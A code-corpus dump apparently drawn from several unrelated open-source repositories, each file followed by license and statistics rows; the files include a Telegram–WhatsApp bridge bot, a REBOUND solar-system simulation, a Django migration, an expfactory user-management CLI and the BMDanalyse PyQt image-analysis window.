self.connection.send([Command.delete, self.telegram_to_whatsapp[str(update.message.chat_id)]])
del self.telegram_to_whatsapp[str(update.message.chat_id)]
bot.sendMessage(update.message.chat_id, text="Hey there, this chat connecion was deleted")
else:
bot.sendMessage(update.message.chat_id, text="Something went terribly wrong :( This chat is not connected")
def run(self):
print("Start TelegramBot with PID: " + str(getpid()))
# connect to TelegramBot with CREDENTIALS
updater = Updater(TelegramBot.CREDENTIALS)
# Get the dispatcher to register handlers
dp = updater.dispatcher
# Message handlers only receive updates that don't contain commands
dp.addTelegramMessageHandler(self.got_telegram)
# got a whatsapp message
dp.addStringRegexHandler('[^/].*', self.got_whatsapp)
dp.addTelegramCommandHandler("help", self.help)
dp.addTelegramCommandHandler("token", self.get_token)
dp.addTelegramCommandHandler("delete", self.delete)
# All TelegramErrors are caught for you and delivered to the error
# handler(s). Other types of Errors are not caught.
#dp.addErrorHandler(error)
# Start the Bot and store the update Queue, so we can insert updates
update_queue = updater.start_polling(poll_interval=0.1, timeout=10)
# save our hashmap when the TelegramBot is terminated
signal.signal(signal.SIGINT, self.save_to_file)
signal.signal(signal.SIGTERM, self.save_to_file)
# load our hashmap when the TelegramBot is started
self.load_from_file()
isRunning = True
while isRunning:
msg = self.connection.recv()
if msg[0] == Command.message:
update_queue.put(str(msg[1])+","+str(msg[2]))
elif msg[0] == Command.token_ack:
# connect Telegram ID to Whatsapp ID
self.telegram_to_whatsapp[str(msg[2])] = msg[1]
update_queue.put(str(msg[2]))
elif msg[0] == Command.token:
print("Error: got wrong message from WhatsappBot")
|
mit
| 7,155,374,051,801,064,000
| 42.4375
| 247
| 0.63757
| false
| 3.707765
| false
| false
| false
|
quasars100/Resonance_testing_scripts
|
python_examples/outersolarsystem/problem.py
|
1
|
1831
|
# Import the rebound module
import rebound
# Set variables (defaults are G=1, t=0, dt=0.01)
k = 0.01720209895 # Gaussian constant
rebound.G = k*k # Gravitational constant
# Setup particles (data taken from NASA Horizons)
# This could also be easily read in from a file.
rebound.add( m=1.00000597682, x=-4.06428567034226e-3, y=-6.08813756435987e-3, z=-1.66162304225834e-6, vx=+6.69048890636161e-6, vy=-6.33922479583593e-6, vz=-3.13202145590767e-9) # Sun
rebound.add( m=1./1047.355, x=+3.40546614227466e+0, y=+3.62978190075864e+0, z=+3.42386261766577e-2, vx=-5.59797969310664e-3, vy=+5.51815399480116e-3, vz=-2.66711392865591e-6) # Jupiter
rebound.add( m=1./3501.6, x=+6.60801554403466e+0, y=+6.38084674585064e+0, z=-1.36145963724542e-1, vx=-4.17354020307064e-3, vy=+3.99723751748116e-3, vz=+1.67206320571441e-5) # Saturn
rebound.add( m=1./22869., x=+1.11636331405597e+1, y=+1.60373479057256e+1, z=+3.61783279369958e-1, vx=-3.25884806151064e-3, vy=+2.06438412905916e-3, vz=-2.17699042180559e-5) # Uranus
rebound.add( m=1./19314., x=-3.01777243405203e+1, y=+1.91155314998064e+0, z=-1.53887595621042e-1, vx=-2.17471785045538e-4, vy=-3.11361111025884e-3, vz=+3.58344705491441e-5) # Neptune
rebound.add( m=0, x=-2.13858977531573e+1, y=+3.20719104739886e+1, z=+2.49245689556096e+0, vx=-1.76936577252484e-3, vy=-2.06720938381724e-3, vz=+6.58091931493844e-4) # Pluto
# Set the center of momentum to be at the origin
rebound.move_to_com()
# timestep counter
steps = 0
# Integrate until t=1e6 (unit of time in this example is days)
while rebound.t < 1e6:
rebound.step()
steps += 1
# Print particle positions every 100 timesteps
if steps%100==0:
for p in rebound.particles:
# time x y z
print(rebound.t, p.x, p.y, p.z)
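# Sanity check (added for illustration, not part of the original script): with these
# units (AU, days, solar masses) G = k*k, so Kepler's third law gives Jupiter's period as
# roughly P = 2*pi*sqrt(a**3 / (G*M_sun)) ~ 2*pi*sqrt(5.2**3) / k ~ 4330 days,
# i.e. about 11.9 years, which matches the expected value.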
|
gpl-3.0
| 544,620,907,989,148,000
| 58.064516
| 188
| 0.687602
| false
| 2.154118
| false
| false
| false
|
hzlf/openbroadcast
|
website/apps/spf/migrations/0020_auto__add_field_match_isrc_list.py
|
1
|
5230
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Match.isrc_list'
db.add_column('spf_match', 'isrc_list',
self.gf('django.db.models.fields.TextField')(null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Match.isrc_list'
db.delete_column('spf_match', 'isrc_list')
models = {
'spf.match': {
'Meta': {'ordering': "('created',)", 'object_name': 'Match'},
'artist': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'artist_credits': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'artist_credits_secondary': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'duration': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'isrc_list': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'iswc_list': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'mb_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'release': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'release_list': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'request': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['spf.Request']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'results_mb': ('django.db.models.fields.TextField', [], {'default': "'{}'", 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'work_list': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'spf.request': {
'Meta': {'ordering': "('swp_id',)", 'object_name': 'Request'},
'catalognumber': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'composer': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'duration': ('django.db.models.fields.PositiveIntegerField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'isrc': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'level': ('django.db.models.fields.IntegerField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'main_artist': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'num_results': ('django.db.models.fields.IntegerField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'obp_legacy_id': ('django.db.models.fields.PositiveIntegerField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'publication_date': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'publication_datex': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'recording_country': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'recording_date': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'recording_datex': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'results_mb': ('django.db.models.fields.TextField', [], {'default': "'{}'", 'null': 'True', 'blank': 'True'}),
'rome_protected': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'swp_id': ('django.db.models.fields.PositiveIntegerField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
}
}
complete_apps = ['spf']
|
gpl-3.0
| -3,241,384,390,019,928,600
| 74.811594
| 169
| 0.546654
| false
| 3.524259
| false
| false
| false
|
vinoth3v/In
|
In/nabar/admin/form/nabar_role.py
|
1
|
1255
|
class FormNabarRoleAdmin(Form):
def __init__(self, data = None, items = None, post = None, **args):
if data is None: data = {}
if post is None: post = {}
if 'id' not in data:
data['id'] = 'FormNabarRoleAdmin'
super().__init__(data, items, **args)
set = self.add('FieldSet', {
'id' : 'set',
'css' : ['i-form-row i-margin-large']
})
table = set.add('HTMLTable')
roles = IN.nabar.roles
for rid, role in roles.items():
row = table['body'].add('HTMLTableRow')
row.add('HTMLTableColumn', {
'value' : role['name'],
'weight' : 1,
})
row.add('HTMLTableColumn', {
'value' : role['info'],
'weight' : 2,
})
set = self.add('FieldSet', {
'id' : 'actionset',
'css' : ['i-form-row i-text-primary']
})
#set.add('Submit', {
#'id' : 'submit',
#'value' : s('Register new account'),
#'css' : ['i-button i-button-primary i-button-large']
#})
self.css.append('i-panel i-panel-box i-margin-large')
@IN.register('FormNabarRoleAdmin', type = 'Former')
class FormNabarRoleAdminFormer(FormFormer):
def validate(self, form, post):
if form.has_errors: # fields may have errors
return
def submit(self, form, post):
if form.has_errors:
return
|
apache-2.0
| 6,403,613,754,088,764,000
| 18.307692
| 68
| 0.578486
| false
| 2.752193
| false
| false
| false
|
expfactory/expfactory
|
expfactory/cli/users.py
|
1
|
3386
|
"""
Copyright (c) 2017-2021, Vanessa Sochat
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from expfactory.logger import bot
from expfactory.defaults import EXPFACTORY_DATABASE
import sys
import os
def main(args, parser, subparser):
from expfactory.server import app
header = "DATABASE\tTOKEN"
# The user wants to list active subjects
if args.list is True:
users = app.list_users() # returns id\ttoken
sys.exit(0)
# The user wants to add new subjects
number = args.new
if number is not None:
print(header)
for i in range(number):
user = app.generate_user()
app.print_user(user)
sys.exit(0)
# The user wants to manage user token
action = None
if args.revoke is not None:
subid = clean(args.revoke)
func = app.revoke_token
action = "Revoking"
elif args.refresh is not None:
subid = clean(args.refresh)
func = app.refresh_token
action = "Refreshing"
elif args.restart is not None:
subid = clean(args.restart)
func = app.restart_user
action = "Restarting"
elif args.finish is not None:
subid = clean(args.finish)
action = "Finishing"
func = app.finish_user
# Perform the action
if action is not None:
bot.info("%s %s" % (action, subid))
result = func(subid=subid)
if result is not None:
print("[%s] %s --> %s" % (action.lower(), subid, result))
else:
print("[%s] not successful. See logs for details." % (action.lower()))
print("Commands may only possible for [active] status.")
sys.exit(0)
print("See expfactory users --help for usage")
def clean(subid):
"""clean a subid, removing any folder extensions (_revoked or _finished)
for the functions
"""
for ext in ["_revoked", "_revoked"]:
subid = subid.replace(ext, "")
return subid
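# Example (added for illustration): clean("abc123_revoked") and clean("abc123_finished")
# both return "abc123", so the action functions above receive the bare subject id.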
|
bsd-3-clause
| 55,951,420,547,235,040
| 33.20202
| 82
| 0.69049
| false
| 4.227216
| false
| false
| false
|
mhogg/BMDanalyse
|
BMDanalyse/MainWindow.py
|
1
|
30163
|
# -*- coding: utf-8 -*-
# Copyright (C) 2016 Michael Hogg
# This file is part of BMDanalyse - See LICENSE.txt for information on usage and redistribution
import os, matplotlib, matplotlib.pyplot, types
import numpy as np
from pyqtgraph.Qt import QtCore, QtGui
from pyqtgraph import ImageItem
from pyqtgraph.widgets.GraphicsLayoutWidget import GraphicsLayoutWidget
from PIL import Image
from ViewBoxCustom import MultiRoiViewBox, ImageAnalysisViewBox
from MatplotlibWidget import MatplotlibWidget
from SidePanel import SidePanel
from TableWidget import TableWidget
from version import __version__
absDirPath = os.path.dirname(__file__)
class MainWindow(QtGui.QMainWindow):
def __init__(self, parent=None):
QtGui.QMainWindow.__init__(self, parent)
self.loadIcons()
self.setupUserInterface()
self.setupSignals()
self.__version__ = __version__
# Initialise variables
self.imageFiles = {}
self.timeData = None
self.plotWin = None
self.imageWin = None
self.BMDchange = None
self.roiNames = None
def loadIcons(self):
""" Load icons """
self.icons = dict([
('BMDanalyseIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","logo.png"))),
('imageAddIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","file_add.png"))),
('imageRemIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","file_delete2.png"))),
('imageDownIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","arrow-up-2.png"))),
('imageUpIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","arrow-down-2.png"))),
('imagePrevIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","arrow-left.png"))),
('imageNextIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","arrow-right.png"))),
('roiAddIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","green-add3.png"))),
('roiRectIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","rectangularIcon.png"))),
('roiPolyIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","polygonIcon.png"))),
('roiRemIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","red_delete.png"))),
('roiSaveIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","filesave.png"))),
('roiCopyIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","file_copy.png"))),
('roiLoadIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","opened-folder.png")))])
def setupUserInterface(self):
""" Initialise the User Interface """
# Left frame
leftFrame = QtGui.QFrame()
leftFrameLayout = QtGui.QHBoxLayout()
leftFrame.setLayout(leftFrameLayout)
leftFrame.setLineWidth(0)
leftFrame.setFrameStyle(QtGui.QFrame.Panel)
leftFrameLayout.setContentsMargins(0,0,5,0)
# Left frame contents
self.viewMain = GraphicsLayoutWidget() # A GraphicsLayout within a GraphicsView
leftFrameLayout.addWidget(self.viewMain)
self.viewMain.setMinimumSize(200,200)
self.vb = MultiRoiViewBox(lockAspect=True,enableMenu=True)
self.viewMain.addItem(self.vb)
self.vb.disableAutoRange()
# Right frame
self.sidePanel = SidePanel(self)
# UI window (containing left and right frames)
UIwindow = QtGui.QWidget(self)
UIwindowLayout = QtGui.QHBoxLayout()
UIwindowSplitter = QtGui.QSplitter(QtCore.Qt.Horizontal)
UIwindowLayout.addWidget(UIwindowSplitter)
UIwindow.setLayout(UIwindowLayout)
self.setCentralWidget(UIwindow)
UIwindowSplitter.addWidget(leftFrame)
UIwindowSplitter.addWidget(self.sidePanel)
# Application window
self.setWindowTitle('BMDanalyse')
self.setWindowIcon(self.icons['BMDanalyseIcon'])
self.setMinimumSize(600,500)
self.resize(self.minimumSize())
# Window menus
self.createMenus()
self.createActions()
def createMenus(self):
# Menus
menubar = self.menuBar()
self.fileMenu = menubar.addMenu('&File')
self.imageMenu = menubar.addMenu('&Images')
self.roiMenu = menubar.addMenu('&ROIs')
self.submenu = self.roiMenu.addMenu(self.icons['roiAddIcon'],"Add ROI")
self.analyseMenu = menubar.addMenu('&Analysis')
self.aboutMenu = menubar.addMenu('A&bout')
def createActions(self):
# Actions for File menu
self.exitAct = QtGui.QAction("&Quit", self, shortcut="Ctrl+Q",statusTip="Exit the application")
self.exitAct.triggered[()].connect(self.close)
self.fileMenu.addAction(self.exitAct)
# Actions for Images menu
self.loadImageAct = QtGui.QAction(self.icons['imageAddIcon'], "&Load image(s)", self, shortcut="Ctrl+L")
self.removeImageAct = QtGui.QAction(self.icons['imageRemIcon'], "&Remove current image", self, shortcut="Ctrl+X")
imageMenuActions = [self.loadImageAct,self.removeImageAct]
imageMenuActFuncs = [self.loadImages,self.removeImage]
for i in xrange(len(imageMenuActions)):
action = imageMenuActions[i]
function = imageMenuActFuncs[i]
action.triggered[()].connect(function)
self.imageMenu.addAction(self.loadImageAct)
self.imageMenu.addAction(self.removeImageAct)
# Actions for ROI menu
self.addROIRectAct = QtGui.QAction("Rectangular",self.submenu)
self.addROIPolyAct = QtGui.QAction("Polygon",self.submenu)
self.addROIRectAct.triggered[()].connect(self.vb.addROI)
self.addROIPolyAct.triggered[()].connect(self.vb.addPolyRoiRequest)
self.submenu.addAction(self.addROIRectAct)
self.submenu.addAction(self.addROIPolyAct)
self.addROIRectAct.setIcon(self.icons['roiRectIcon'])
self.addROIPolyAct.setIcon(self.icons['roiPolyIcon'])
self.addROIRectAct.setShortcut("Ctrl+Shift+R")
self.addROIPolyAct.setShortcut("Ctrl+Shift+P")
self.loadRoiAct = QtGui.QAction(self.icons['roiLoadIcon'], "L&oad ROI", self, shortcut="Ctrl+O")
self.copyRoiAct = QtGui.QAction(self.icons['roiCopyIcon'], "&Copy ROI", self, shortcut="Ctrl+C")
self.saveRoiAct = QtGui.QAction(self.icons['roiSaveIcon'], "&Save ROI", self, shortcut="Ctrl+S")
self.remRoiAct = QtGui.QAction(self.icons['roiRemIcon'] , "&Remove ROI", self, shortcut="Ctrl+D")
roiMenuActions = [self.loadRoiAct,self.copyRoiAct,self.saveRoiAct,self.remRoiAct]
roiMenuActFuncs = [self.vb.loadROI,self.vb.copyROI,self.vb.saveROI,self.vb.removeROI]
for i in xrange(len(roiMenuActions)):
action = roiMenuActions[i]
function = roiMenuActFuncs[i]
action.triggered[()].connect(function)
self.roiMenu.addAction(action)
# Actions for Analyse menu
self.roiAnalysisAct = QtGui.QAction("&ROI analysis", self.viewMain, shortcut="Ctrl+R",triggered=self.getBMD)
self.imgAnalysisAct = QtGui.QAction("&Image analysis", self.viewMain, shortcut="Ctrl+I",triggered=self.imageAnalysis)
self.analyseMenu.addAction(self.roiAnalysisAct)
self.analyseMenu.addAction(self.imgAnalysisAct)
# Actions for
self.aboutAct = QtGui.QAction("&About", self.viewMain, shortcut='F1', triggered=self.onAbout)
self.aboutMenu.addAction(self.aboutAct)
def setupSignals(self):
""" Setup signals """
self.sidePanel.imageFileList.itemSelectionChanged.connect(self.getImageToDisplay)
self.sidePanel.buttImageAdd.clicked.connect(self.loadImages)
self.sidePanel.buttImageRem.clicked.connect(self.removeImage)
self.sidePanel.buttImageUp.clicked.connect(self.sidePanel.moveImageUp)
self.sidePanel.buttImageDown.clicked.connect(self.sidePanel.moveImageDown)
self.sidePanel.roiMenu.button1.clicked[()].connect(self.vb.addROI)
self.sidePanel.roiMenu.button2.clicked[()].connect(self.vb.addPolyRoiRequest)
self.sidePanel.buttRoiCopy.clicked[()].connect(self.vb.copyROI)
self.sidePanel.buttRoiRem.clicked.connect(self.vb.removeROI)
self.sidePanel.buttRoiLoad.clicked.connect(self.vb.loadROI)
self.sidePanel.buttRoiSave.clicked.connect(self.vb.saveROI)
self.sidePanel.buttRoiAnalysis.clicked.connect(self.getBMD)
self.sidePanel.buttImgAnalysis.clicked.connect(self.imageAnalysis)
def onAbout(self):
""" About BMDanalyse message"""
author ='Michael Hogg'
date ='2016'
version = self.__version__
QtGui.QMessageBox.about(self, 'About BMDanalyse',
"""
<b>BMDanalyse</b>
<p>A simple program for the analysis of a time series of Bone Mineral Density (BMD) images.</p>
<p>Used to evaluate the bone gain / loss in a number of regions of interest (ROIs) over time,
typically due to bone remodelling as a result of stress shielding around an orthopaedic implant.</p>
<p><table border="0" width="150">
<tr>
<td>Author:</td>
<td>%s</td>
</tr>
<tr>
<td>Version:</td>
<td>%s</td>
</tr>
<tr>
<td>Date:</td>
<td>%s</td>
</tr>
</table></p>
""" % (author,version,date))
def loadImages(self):
""" Load an image to be analysed """
newImages = {}
fileNames = QtGui.QFileDialog.getOpenFileNames(self, self.tr("Load images"),QtCore.QDir.currentPath())
# Fix for PySide. PySide doesn't support QStringList types. PyQt4 getOpenFileNames returns a QStringList, whereas PySide
# returns a type (the first entry being the list of filenames).
if isinstance(fileNames,types.TupleType): fileNames = fileNames[0]
if hasattr(QtCore,'QStringList') and isinstance(fileNames, QtCore.QStringList): fileNames = [str(i) for i in fileNames]
if len(fileNames)>0:
for fileName in fileNames:
if fileName!='':
img = Image.open(str(fileName))
imgarr = np.array(img.convert('L')) # Convert to 8-bit
imgarr = imgarr.swapaxes(0,1)
imgarr = imgarr[:,::-1]
newImages[fileName] = imgarr
            # Add filenames to the list widget. Only add new filenames. If a filename already
            # exists, it will not be added again, but its data will be updated
for fileName in sorted(newImages.keys()):
if not self.imageFiles.has_key(fileName):
self.sidePanel.addImageToList(fileName)
self.imageFiles[fileName] = newImages[fileName]
# Show image in Main window
self.vb.enableAutoRange()
if self.sidePanel.imageFileList.currentRow()==-1:
self.sidePanel.imageFileList.setCurrentRow(0)
self.showImage(str(self.sidePanel.imageFileList.currentItem().text()))
self.vb.disableAutoRange()
def removeImage(self):
""" Remove image from sidePanel imageFileList """
# Return if there is no image to remove
if self.vb.img is None: return
# Get current image in sidePanel imageFileList and remove from list
currentRow = self.sidePanel.imageFileList.currentRow()
image = self.sidePanel.imageFileList.takeItem(currentRow)
imageName = str(image.text())
# Delete key and value from dictionary
if imageName!='': del self.imageFiles[imageName]
# Get image item in imageFileList to replace deleted image
if self.sidePanel.imageFileList.count()==0:
self.vb.enableAutoRange()
self.vb.removeItem(self.vb.img)
self.vb.showImage(None)
self.vb.disableAutoRange()
else:
currentRow = self.sidePanel.imageFileList.currentRow()
imageName = str(self.sidePanel.imageFileList.item(currentRow).text())
self.showImage(imageName)
def showImage(self,imageFilename):
""" Shows image in main view """
self.arr = self.imageFiles[imageFilename]
self.vb.showImage(self.arr)
def getImageToDisplay(self):
""" Get current item in file list and display in main view"""
try: imageFilename = str(self.sidePanel.imageFileList.currentItem().text())
except: pass
else: self.showImage(imageFilename)
def getBMD(self):
""" Get change in BMD over time (e.g. for each image) for all ROIs.
Revised function that converts the list of images into a 3D array
and then uses the relative position of the ROIs to the current
image, self.vb.img, to get the average BMD value e.g. it doesn't use
setImage to change the image in the view. This requires that all
images are the same size and in the same position.
"""
# Return if there is no image or rois in view
if self.vb.img is None or len(self.vb.rois)==0: return
# Collect all images into a 3D array
imageFilenames = self.sidePanel.getListOfImages()
images = [self.imageFiles[str(name.text())] for name in imageFilenames]
imageData = np.dstack(images) # Doesn't work correctly if images are not all the same shape
numImages = len(images)
# Get BMD across image stack for each ROI
numROIs = len(self.vb.rois)
BMD = np.zeros((numImages,numROIs),dtype=float)
self.roiNames = []
for i in xrange(numROIs):
roi = self.vb.rois[i]
self.roiNames.append(roi.name)
arrRegion = roi.getArrayRegion(imageData,self.vb.img, axes=(0,1))
avgROIvalue = arrRegion.mean(axis=0).mean(axis=0)
BMD[:,i] = avgROIvalue
# Calculate the BMD change (percentage of original)
tol = 1.0e-06
for i in xrange(numROIs):
if abs(BMD[0,i])<tol:
BMD[:,i] = 100.
else:
BMD[:,i] = BMD[:,i] / BMD[0,i] * 100.
self.BMDchange = BMD-100.
if self.timeData is None or self.timeData.size!=numImages:
self.timeData = np.arange(numImages,dtype=float)
# Plot results
self.showResults()
def imageAnalysis(self):
# Generate images of BMD change
if self.vb.img is None: return
self.showImageWin()
def sliderValueChanged(self,value):
self.imageWin.sliderLabel.setText('BMD change: >= %d %s' % (value,'%'))
self.setLookupTable(value)
self.imageWin.vb.img2.setLookupTable(self.lut)
self.imageWin.vb.img2.setLevels([0,255])
def setLookupTable(self,val):
lut = []
for i in range(256):
if i > 127+val:
lut.append(matplotlib.cm.jet(255))
elif i < 127-val:
lut.append(matplotlib.cm.jet(0))
else:
lut.append((0.0,0.0,0.0,0.0))
lut = np.array(lut)*255
self.lut = np.array(lut,dtype=np.ubyte)
def createImageWin(self):
self.buttMinimumSize = QtCore.QSize(70,36)
self.iconSize = QtCore.QSize(24,24)
if self.imageWin==None:
self.imageWin = QtGui.QDialog(self, QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowTitleHint | \
QtCore.Qt.WindowMinimizeButtonHint | QtCore.Qt.WindowMaximizeButtonHint)
self.imageWin.setWindowTitle('BMDanalyse')
self.imageWin.setWindowIcon(self.icons['BMDanalyseIcon'])
self.imageWin.setMinimumSize(250,500)
self.imageWin.resize(self.imageWin.minimumSize())
# Create viewBox
self.imageWin.glw = GraphicsLayoutWidget() # A GraphicsLayout within a GraphicsView
self.imageWin.vb = ImageAnalysisViewBox(lockAspect=True,enableMenu=True)
self.imageWin.vb.disableAutoRange()
self.imageWin.glw.addItem(self.imageWin.vb)
arr = self.imageFiles.values()[0]
self.imageWin.vb.img1 = ImageItem(arr,autoRange=False,autoLevels=False)
self.imageWin.vb.addItem(self.imageWin.vb.img1)
self.imageWin.vb.img2 = ImageItem(None,autoRange=False,autoLevels=False)
self.imageWin.vb.addItem(self.imageWin.vb.img2)
self.imageWin.vb.autoRange()
lut = [ [ int(255*val) for val in matplotlib.cm.gray(i)[:3] ] for i in xrange(256) ]
lut = np.array(lut,dtype=np.ubyte)
self.imageWin.vb.img1.setLookupTable(lut)
# Label to show index of current image label
self.imageCurrCont = QtGui.QFrame()
self.imageCurrCont.setLineWidth(2)
self.imageCurrCont.setFrameStyle(QtGui.QFrame.Panel | QtGui.QFrame.Raised)
self.imageCurrCont.setMinimumWidth(70)
self.imageWin.currLabel = QtGui.QLabel("")
self.imageWin.currLabel.setAlignment(QtCore.Qt.AlignHCenter)
imageCurrContLayout = QtGui.QHBoxLayout()
imageCurrContLayout.addWidget(self.imageWin.currLabel)
self.imageCurrCont.setLayout(imageCurrContLayout)
# Create buttons to select images
self.imageWin.buttCont = QtGui.QWidget()
self.imageWin.buttPrev = QtGui.QPushButton(self.icons['imagePrevIcon'],"")
self.imageWin.buttNext = QtGui.QPushButton(self.icons['imageNextIcon'],"")
self.buttLayout = QtGui.QHBoxLayout()
self.buttLayout.addStretch(1)
self.buttLayout.addWidget(self.imageWin.buttPrev)
self.buttLayout.addWidget(self.imageCurrCont)
self.buttLayout.addWidget(self.imageWin.buttNext)
self.buttLayout.addStretch(1)
self.imageWin.buttCont.setLayout(self.buttLayout)
self.imageWin.buttPrev.setMinimumSize(self.buttMinimumSize)
self.imageWin.buttNext.setMinimumSize(self.buttMinimumSize)
self.imageWin.buttPrev.setIconSize(self.iconSize)
self.imageWin.buttNext.setIconSize(self.iconSize)
self.buttLayout.setContentsMargins(0,5,0,5)
self.imageWin.buttPrev.clicked.connect(self.prevImage)
self.imageWin.buttNext.clicked.connect(self.nextImage)
# Create slider
self.imageWin.sliderCon = QtGui.QWidget()
self.imageWin.slider = QtGui.QSlider(self)
self.imageWin.slider.setOrientation(QtCore.Qt.Horizontal)
self.imageWin.slider.setMinimum(1)
self.imageWin.slider.setMaximum(100)
self.imageWin.slider.setMinimumWidth(100)
self.imageWin.slider.valueChanged.connect(self.sliderValueChanged)
self.imageWin.sliderLabel = QtGui.QLabel('1')
self.imageWin.sliderLabel.setMinimumWidth(120)
self.sliderLayout = QtGui.QHBoxLayout()
self.sliderLayout.addStretch(1)
self.sliderLayout.addWidget(self.imageWin.sliderLabel)
self.sliderLayout.addWidget(self.imageWin.slider)
self.sliderLayout.addStretch(1)
self.imageWin.sliderCon.setLayout(self.sliderLayout)
self.sliderLayout.setContentsMargins(0,0,0,5)
# Format image window
self.imageWinLayout = QtGui.QVBoxLayout()
self.imageWinLayout.addWidget(self.imageWin.glw)
self.imageWinLayout.addWidget(self.imageWin.buttCont)
self.imageWinLayout.addWidget(self.imageWin.sliderCon)
self.imageWin.setLayout(self.imageWinLayout)
self.imageWin.imagesRGB = None
# Show
self.imageWin.show()
self.imageWin.slider.setValue(10)
self.sliderValueChanged(10)
self.imageWinIndex = 0
def prevImage(self):
minIndex = 0
currIndex = self.imageWinIndex
prevIndex = currIndex - 1
self.imageWinIndex = max(prevIndex,minIndex)
self.updateImageWin()
def nextImage(self):
numImages = len(self.imageFiles)
maxIndex = numImages - 1
currIndex = self.imageWinIndex
nextIndex = currIndex + 1
self.imageWinIndex = min(nextIndex,maxIndex)
self.updateImageWin()
def updateImageWin(self):
imageFilenames = self.sidePanel.getListOfImages()
imageName = imageFilenames[self.imageWinIndex]
self.imageWin.vb.img1.setImage(self.imageFiles[str(imageName.text())],autoLevels=False)
self.imageWin.vb.img2.setImage(self.imageWin.imagesRGB[self.imageWinIndex],autoLevels=False)
